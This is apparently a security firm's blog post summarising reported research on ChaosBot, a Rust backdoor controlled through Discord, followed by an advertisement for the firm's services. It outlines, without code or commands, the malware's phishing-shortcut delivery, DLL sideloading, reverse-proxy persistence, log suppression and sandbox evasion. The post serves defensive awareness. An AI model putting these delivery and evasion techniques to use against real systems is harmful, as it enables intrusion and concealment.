A new strain of malware known as ChaosBot is making waves in the cybersecurity community. Written in the Rust programming language, this backdoor is notable for how it uses Discord, a popular chat application, to issue commands and control infected devices remotely.
Unlike many traditional malware families that rely on custom command servers, ChaosBot hides in plain sight by using legitimate communication channels. This clever design makes it harder for organizations to detect malicious activity before real damage is done.
Key Facts About ChaosBot
- Language: Built in Rust, a fast and memory-safe programming language often favored for new malware development.
- Primary Function: Remote command execution and system control via Discord channels.
- First Discovered: September 2025 by eSentire during an investigation at a financial services firm.
- Main Infection Method: Phishing emails with malicious Windows shortcut (LNK) attachments.
- Unique Tactic: Uses fake PDF documents to distract victims during installation.
How ChaosBot Works
According to researchers, the attack begins when threat actors gain access to corporate networks using stolen credentials linked to a Cisco VPN and an over-privileged Active Directory account. Once inside, they use Windows Management Instrumentation (WMI) to execute remote commands and spread the infection.
Every compromised device connects to a private Discord channel that the attacker controls. From there, the malware operator known online as “chaos_00019” can send instructions to the infected system. These instructions may include executing PowerShell commands, taking screenshots, or transferring files between the device and Discord.
Deployment and Payload
ChaosBot spreads primarily through phishing campaigns containing malicious shortcut files. When a victim opens the file, a PowerShell command runs in the background, silently downloading and executing the malware. At the same time, a decoy PDF appears on the screen, giving the impression that the attachment is legitimate.
Once executed, the malware loads a malicious DLL file (msedge_elf.dll) through Microsoft Edge’s identity_helper.exe process. It then performs reconnaissance, installs a Fast Reverse Proxy (FRP) to maintain a persistent connection, and waits for further instructions through the Discord channel.
Evasion and Stealth Techniques
ChaosBot incorporates several features designed to avoid detection. It disables Windows Event Tracing (ETW) to suppress activity logs and checks MAC address prefixes to identify if it’s running in a virtual machine. If the system appears to be an analysis environment, the malware immediately terminates itself to stay hidden.
Why ChaosBot Is Dangerous
The use of trusted platforms like Discord for command and control represents a growing cybersecurity concern. By blending into normal internet traffic, ChaosBot can bypass many network security tools that filter out suspicious connections.
For businesses, this means that traditional defenses are no longer enough. Monitoring communication traffic, restricting privileged account access, and enforcing multi-factor authentication (MFA) are critical measures to help reduce risk.
How Skyriver IT Can Help Protect Your Business
Our cybersecurity experts use advanced monitoring tools, proactive threat intelligence, and proven defensive strategies to safeguard your systems before an attack occurs.
Our cybersecurity solutions include:
- 24/7 Network Monitoring: Constant oversight to detect and respond to unusual activity in real time.
- Advanced Threat Detection: AI-driven analysis to identify emerging malware behaviors.
- Employee Training Programs: Practical phishing and awareness training to reduce user-based risks.
- Vulnerability and Patch Management: Ongoing assessments and updates to close security gaps.
- Incident Response and Recovery: Fast containment and remediation to minimize downtime and data loss.
Cyberattacks continue to evolve, but with Skyriver IT as your trusted partner, your business can stay one step ahead of cybercriminals. Contact us today!
